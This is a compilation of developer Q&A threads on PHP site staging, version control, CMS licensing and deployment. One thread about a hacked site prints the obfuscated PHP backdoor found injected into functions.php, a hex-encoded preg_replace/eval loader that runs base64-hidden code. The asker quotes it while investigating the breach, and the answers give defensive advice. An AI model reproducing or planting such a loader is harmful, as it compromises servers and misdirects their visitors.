Sandboxing website best practices? - php

I currently work in a web shop with almost no formal processes and a million PHP websites, including tricky stuff like custom CMS and shopping cart code.
We are trying to improve things. I am pushing for CVS/SVN.
My question is, what is the best practice for sandboxing website work? We are on the LAMP stack. Some of our sites have hardcoded (or user-inputted links) to the current domain, so setting up a different domain like preview.mysite.com will break links pointing to www.mysite.com. If we start applying regression tests, perhaps the domains should be uniform for testing? That can always be done with a local host entry.
So, considering we have lots of sites, it would be nice to have one process for always doing previewing in a proper sandbox. Wondering how this would integrate with an SVN/CVS cycle.
I am just looking for industry best practices because we are trying to get there. If that means cloning a site to an extra server, so be it.

So yes, you should have a second STAGE server. What I do is put my code into CVS on my dev box, and do regular commits as i go along. When I am ready to push a version to the "STAGE" server, I go through the files I want to STAGE and tag them STAGE:
cvs tag -F STAGE
Then I go to the STAGE server and do an update with the STAGE flag to get the STAGE version of files:
cvs up -r STAGE
This also sets the sticky tag to be "STAGE" on those files, so in the future, I can just leave the STAGE tag off when I do updates on my stage server:
cvs up
finally, when I've tested my code on the STAGE server, I roll it to the production server using rsync...
We have several developers working together so keeping a stable STAGE version up can get tricky. In that case, if I just have small changes to one or two files, I will just scp them individually over to the production server..
Finally, to ensure I know what is out on my production servers, after I send a file or files off to the production server, I tag all the files on my stage server as RELEASE, and also as RELEASE20090713 or whatever the current date is.. That way I have moving snapshots though time that I can get if needed. Note though, this doesn't update the sticky tag, so my regular old
cvs up
on the stage server still gets me the latest STAGE files.
Now in your case, as far as the hardcoded URL's goes... You already know.. bad bad bad... so fix them as you go... But you may be able to use apache URL rewriting to rewrite URL's on STAGE to talk to a custom TCP port.
If you have a smart network device like a cisco router, you can set it up to do PAT (port address translation) for your IP's. Port 80 can forward to your regular production webserver, and port 8080 can forward to your STAGE server (its port 80).. Then all you do is have apache do URL rewriting on your STAGE server and append 8080 to all the hostnames it sees. Now all your posts and links will go to the correct STAGE servers, and your apache configs can be exactly the same also.

Regarding the hard coded (or user-inputted) domain names: you could add the domains to your hosts file. That should solve your problems during development and preview. Your browser will retrieve the IP for www.mysite.com and find 127.0.0.1 or the IP of the preview site in the hosts file. The tricky part is that just by looking at the URL in the browser, you cannot determine whether you are looking at the production site or not. (The ShowIP addon for Firefox can help you here.)
Regarding CVS/SVN: I would really advice you to go for SVN. It's not harder to use than CSV but has some advantages (e.g. renaming is possible). For more information see e.g. this question.
As for the previewing in a sandbox, this is what we do: we do most of our development on trunk (or on a branch, but the rest of the process is almost the same). Once we are ready to show it to the customer, we create a tag. This tag is used to update the preview server. If the customer isn't satisfied, we develop some more on trunk (or the branch), create a new tag, update preview with the tag, etc. Once the customer is happy we use the exact same tag running on preview to also update the production server. This way we can be sure that the preview and production server have the same code base.

Related

How to make your custom php CMS work only on a certain domain for a certain time?

I want to prevent coping my custom made CMS from domain to domain and I want that it is operable only on a doain that it is bought for and onluy for the period 1, 2 years from the purchase.
The code generation part is not a problem, but how to prevent it from modifying from hackers is the hardest part.
E.g. something like vBulletin protection. (I know it can be nulled too)
How to implement such thing into my CMS written in php?
I think it needs to be spread through the whole app on various places the variable check and masked in some ways, so the dependencies is not easy to detect and remove.
I know that it is very difficult and hard topic, so I appreciate some direction like book, web discussion or article.
Btw. connecting to my server and checking if the domain is ok is not an option, my servers could be down and the clients as a result of not possible connection too.
You could do a combination of things..
New client domains can be given generated license keys that are unique to each of your client's install that is need for your software to work. The key should be bound one per hosted domain and should be stored remotely on your servers as well as locally on the client install.
When you or someone else is installing the cms for the first time make it required to enter the license key and verify it with a remote server. This should suffice for the initial setup time. Store some info about the server in your remote database. If this remote procedure fails installation should render unsuccessful. Think of clever ways to make this necessary and required like fetching an encryption key to be stored in the database.
During or after install you can generate encryption keys (or not) and store something unique in a file on the app server that is required by your code. Super cheap would be to create the file /MY-CUSTOM-CMS-LICENSE.txt with the key in plain text right inside it. This can be another vector for verification later on. Should you discover a website which has copied your cms you can check this txt file.
Have your software call home to your server every now and then sending the key plus some server info (ip, host, etc). It does not have to be dependent on your server to run. Meaning you can let the software run if it fails. It is just very helpful to call home every now and then. For example every X days to ping a url on your server and if your server is down just have it do the call home check the next day. One reason why this is so handy is if your client copies the app folder from one domain to another domain to setup a second illegal site, as soon as they run index.php file it will call home. And if they have not checked every line of your code and don't know it even does this they would be caught rather easily. All you need to do is check some kind of log of who 'called home' so to speak.
Write up proper software license agreement with the terms for your product and place it in a file called LICENSE located in the root directory of your app. This will ensure clients (and their developers) are aware it is not free to copy and reuse. Later if someone copies it, you (or your lawyers) can point to the file and say 'didn't you read this jerky-boy'
Make something (or many things) in your code unique to your code. For example wordpress' admin by default is /wp-admin and almost every single file in their app starts with wp- which makes it easy to detect. Add the entire app in a special folder. Add a meta tags to all output like <meta name="generator" content="vBulletin 4.0.4" />. There are many other things you can incorporate and write into your app that could be tell tail signs it is your code. The point is to have so many things that make the job of removing everything a daunting task or just annoying to the thief. I don't think anyone would be crazy enough to refactor all your code just to steal it. If they do remove these code bits and resell/reuse it you have an even stronger case for litigation.
You could write a script to crawl the web (ugh) or just do searches on google or even setup Google alerts to notify you if any of detectable methods you placed in your app are found (like in #3, #4, #5, #6, #8)
You could buy a CDN like www.maxcdn.com and host a JavaScript file on there and put that into your code. <script src="http://cms-headquarters.example.com/license.js"> since it is on a CDN is has very small chance of failing and if it goes down for a week that's OK too, all you need to do is check who hasn't hit your server.
Obfuscate some of your code for an added annoying deterrence.
On how vbulletin does it:
http://www.sitepoint.com/forums/showthread.php?281666-How-does-the-vBulletin-License-work
https://www.vbulletin.com/forum/showthread.php/338346-Easy-Way-To-Find-Nulled-vBulletins
Finally here's a PHP class that tries to offer a partial solution: PADL (PHP Application Distribution License System)

Injection of PHP code to perform a 301

Some how I have managed to be attacked in a very specific manner on a site I help mantain and I am looking into whether or not the server was directly hacked or someone was able to inject the malicious script somehow.
First someone managed to get this:
#preg_replace("\x7c\50\x5b\136\x3c\135\x2b\51\x7c\151\x73\145","\x65\166\x61\154\x28\47\x24\142\x66\167\x3d\71\x30\65\x38\67\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x62\146\x77\75\x39\60\x35\70\x37\73","\x4c\62\x35\157\x59\156\x4d\166\x64\62\x56\151\x4c\62\x78\160\x64\155\x55\166\x61\110\x52\153\x62\62\x4e\172\x4c\63\x52\154\x63\63\x51\166\x62\107\x56\62\x5a\127\x77\171\x58\63\x52\154\x63\63\x51\166\x62\107\x39\156\x4c\171\x34\154\x4f\104\x49\64\x52\123\x55\167\x4d\104\x45\172\x4a\125\x49\64\x52\152\x4d\154\x51\153\x4d\170\x51\151\x56\103\x4d\152\x4a\103\x4a\124\x52\107\x4e\124\x63\75");
Into the very top of a PHP file right after the files comments. What this, and most likey other code did, was 301 redirect anyone not connecting to the site through a browser to a payday loan site. This ONLY effected my homepage, all other pages where fine.
There was probably more code to do it but this was the most confusing part since this code sits in a file called functions.php which is only ever included however IT IS the first file to be included within index.php (my homepage).
It is completely confusing me how some one could have got code there without directly hacking the server, there is no user input used there, it is literally sitting above the entire file. There is nothing there except this injected code and some comments above.
My envo is:
Gentoo
PHP 5.2.14-pl0-gentoo
Apache 2
I have checked server logs however, as usual, they deleted their trail.
This is also partly, as you have noticed, a server question but atm it is 90% programming question so I thought I would ask it here first.
Is there any vulnerability within PHP that could cause this?
If you need clarification let me know.
Edit
I have a staging system which has a
Work
Preview
Live
I know this is nothing to do with SQL injection since if I switch live and preview folder around I get no problems. I also do not store the gentoo password within the DB or the App and you can only connect to the server in a small range of IP addresses except for Apache which accept 80 and 443 connections from any host. Plus I use SQL escaping classes and methods within the site (PDO, MySQLi etc).
So this problem (which is even more confusing) is only located within one copy of my site and not the DB or anything.
Pinpointing this kind of things is more on the server admin side I guess. Check the attacker-modified file date, and look for for suspicious activity in that date and time in the server's log (apache logs, FTP logs, ssh logs maybe). This also may depend on your traffic, log size, and level of access to your server, as it may be prohibitive. If you have any html form that upload files, verify the directory in wich the files are stored for php shells . Also check the permissions on that directory. If you are on a shared hosting, this also can be the result of the attacker injecting a shell on another site, and then attacking yours by that mean. In that case contact your hosting company.
It's 99% chance the webserver fault, SQL injection is one thing, but I don't know, maybe they managed to somehow get your password with SQL injection and then log in to a control panel or ftp, but, I'd say it's the webserver.
Ok so I understand how and why now. It was the one thing I thought it would never be: Wordpress.
I was basically a victim of: http://muninn.net/blog/2012/06/a-tale-of-east-asian-history-british-loan-sharks-and-a-russian-hacker.html
Using a tool like: http://www.youtube.com/watch?v=y-Z5-uHvONc
You see even though my main site is not made from wordpress and it has got a wordpress blog located at: /blog/ the hacker was able to use various Wordpress vulnerabilities to get around the location problem and plant scripts on any part of the server.
By the way, this actually happened on the latest install of Wordpress. Double checked the version. We are not totally sure exactly when he placed the script (there are multiple instances of the foreign script being placed throughout the years!) but we do know this recent attack must have been sited also quite recently which puts the latest version (or the version before) under a huge amount of scrutiny.
So a nice note of caution about Wordpress there...

How to upload changes automatically?

I'm developing a simple website(in a VPS) using php.
My question is: how can I send the changes I do using a secure protocol?
At the moment I use scp but I need a software that check if the file is changed, if yes sends it to the server.
Advice?
use inotify+rsync or lsyncd http://code.google.com/p/lsyncd/
check out this blog post for the inotify method http://www.cyberciti.biz/faq/linux-inotify-examples-to-replicate-directories/
If you have complete access to your VPS, then you can mount your remote home directory, via ssh and webdav, locally as a normal filesystem. Afterwards you can edit on your computer locally. Any changes should be automatically uploaded.
Have a look at this relevant article
FTP(S): Set up an FTP server on the target, together with an SSL cert (a personal cert is good enough).
SSH: You can pass files around through SSH itself, but I found it most unreliable (imho).
Shares: You could share a folder (as the other people suggested) with your local machine. This would be the perfect solution if it wasn't hard at diagnosing disconnection issues. I've been through this and it is far from a pleasant experience.
Dropbox: Set up a dropbox server on your VPS and a dropbox client on your local PC. Using dropbox (or similar methods like skydrive, icloud..), also has some added advantages, eg, versioning, recovery, conflict detection...
All in all, I think the FTPS way is the most reliable and popular one I've ever used. Via SSH, it caused several issues after using it from about 2 days. The disk sharing method caused me several issues mostly because it requires that you are somewhat knowledgeable with the protocol etc.
The dropbox way, although a bit time-consuming to set up, is still a good solution. However, I would only use it for larger clients, not the average pet hobby website :)
Again, this is just from experience.
You could also use Subversion to do this, although the setup may take a little while.
You basically create a Subversion repository and commit all of your code. Then on your web server, make the root directory a checkout of that repository.
Create a script that runs a svn update command, and set it as a post-commit hook. Essentially, the script would be executed every time you would do a commit from your workstation.
So in short, you would...
Update your code locally
Commit via Subversion (use Tortoise SVN, it's easy and simple to use)
Automatically, the commit would trigger the post-commit hook on the server and run the svn update command to synchronize the code in your root directory.
You would of course have to hide all of the .svn folders to the public using .htaccess files (providing you're using Apache).
I know this would work, as I have done it in the past.
The beauty of this option is that you also get a two in one. Source versionning and easy updates. If you make a mistake, you can also easily revert them back.

Process for updating a live website

What is the best process for updating a live website?
I see that a lot of websites (e.g. StackOverflow) have warnings that there will be downtime for maintenance in advance. How is that usually coded in? Do they have a config value which determines whether to display such a message in the website header?
Also, what do you do if your localhost differs from the production server, and you need to make sure that everything works the same after you transfer? In my case, I set up development.mydomain.com (.htaccess authentication required), which has its own database and is basically my final staging area before uploading everything to the live production site. Is this a good approach to staging?
Lastly, is a simple SFTP upload the way to go? I've read a bit about some more complex methods like using server-side hooks in Git.. Not sure how this works exactly or whether it's the approach I should be taking.
Thanks very much for the enlightenment..
babonk
This is (approximately) how it's done on Google App Engine:
Each time you deploy an application, it is associated with a subdomain according to it's version:
version-1-0.example.com
version-1-1.example.com
while example.com is associated with one of the versions.
When you have new version of server-side software, you deploy it to version-2-0.example.com, and when you are sure to put it live, you associate example.com with it.
I don't know the details, because Google App Engine does that for me, I just set the current version.
Also, when SO or other big site has downtime, that is more probable to be a hardware issue, rather than software.
That will really depend on your website and the platform/technology for your website. For simple website, you just update the files with FTP or if the server is locally accessible, you just copy your new files over. If you website is hosted by some cloud service, then you have to follow whatever steps they offer to you to do it because a cloud based hosting service usually won’t let you to access the files directly. For complicated website that has a backend DB, it is not uncommon that whenever you update code, you have to update your database as well. In order to make sure both are updated at the same time, you will have to take you website down. To minimize the downtime, you will probably want to have a well tested update script to do the actual work. That way you can take down the site, run the script and fire it up again.
With PHP (and Apache, I assume), it's a lot easier than some other setups (having to restart processes, for example). Ideally, you'd have a system that knows to transfer just the files that have changed (i.e. rsync).
I use Springloops (http://www.springloops.com/v2/) to host my git repository and automatically deploy over [S/]FTP. Unless you have thousands of files, the deploy feels almost instantaneous.
If you really wanted to, you could have an .htaccess file (or equivalent) to redirect to a "under maintenance" page for the duration of the deploy. Unless you're averaging at least a few requests per second (or it's otherwise mission critical), you may not even need this step (don't prematurely optimize!).
If it were me, I'd have a an .htacess file that holds redirection instructions, and set it to only redirect during your maintenance hours. When you don't have an upcoming deploy, rename the file to ".htaccess.bak" or something. Then, in your PHP script:
<?php if (file_exists('/path/to/.htaccess')) : ?>
<h1 class="maintenance">Our site will be down for maintenance...</h1>
<?php endif; ?>
Then, to get REALLY fancy, setup a Springloops pre-deploy hook to make sure your maintenance redirect is setup, and a post-deploy hook to change it back on success.
Just some thoughts.
-Landon

Making Changes a Live Site (Codeigniter, but not specific to it)

I'm using Codeigniter if this makes it easier. I'm wondering if a website is live with populated database and users accessing, and I have a new idea to implement into the website, how should I do it? Do you work directly on the live site?
Or do you copy the database and the files to a local server (MAMP/WAMP/XAMMP) and work on it there then if it works update the live site with the changes. For this second method, is there anyway to check which are the files that have been changed and only upload those? What if it works on local sever, but after updating the live site it does not work?
Codeigniter configuration also has the option of default database and other database. I wonder how these can be used for testing?
Don't work directly on the live site. Instead, have a development environment (using, say, vmware or virtualbox on your machine) and clone the live environment. Get you code in version control (I'll say it again: GET YOUR CODE IN VERSION CONTROL), do your development on the development machine, against a dev branch in version control. After you're done testing and happy with the changes, commit them to a 'deployments' or 'live' branch, and deploy on the live site from there. Be sure to do a backup of the database before you roll out the new code.
Edit: use symlinks to stage your new code base on the live site. If it doesn't work, just switch it back to the old directory. Saves you a lot of greif!
Read up on version control (svn, git, et al.).
Never work on a live site, preferably on another server (to prevent while(1){..} crashes etc.), but on the same server at least on another documentroot/domain, preferably with limited access to your IP only.
Normally I only copy the table-definitions (mysqldump -t is nice for that) and have another database altogether, if you need the latest & greatest data, you could replicate your main database to a test-database, which also gives you the advantage of a cheap backup if you haven't got one already.
I usually set a switch in Apache/Vhost configuration (SetEnv DEV=1), so that in code I can use if(getenv('DEV')==1) to check whether I can just dump variables on error conditions, and which limit the possibility of accidentaly committing/uploading code with a 'development switch' still on by accident.
The typical answer to this question is going to be do your work in the test environment, not the production environment. And I agree that that is often the best way to handle changes. If you have the luxury of a test environment, then take full advantage of it. After all, that's what it's there for--to test.
However, that doesn't mean that working in the production environment is completely off-limits. Your decision should be based on a few factors:
Is the operation of your website critical to your business needs?
If so, do all your work in a test environment and deploy it to your live environment when you've fully tested your changes.
Are the changes you're about to make going to have a large impact on the rest of the website?
For example, are you about to change the Database schema? Are you about to change the way users log in or out of your website? If so, do your work in the test environment. If you're changing the behavior of a page that doesn't have any effect elsewhere, you could get away with making the change in the production environment.
How long will your changes take to implement?
If you can't guarantee that your changes won't take longer than 15-20 minutes, do your work in a test environment.

Categories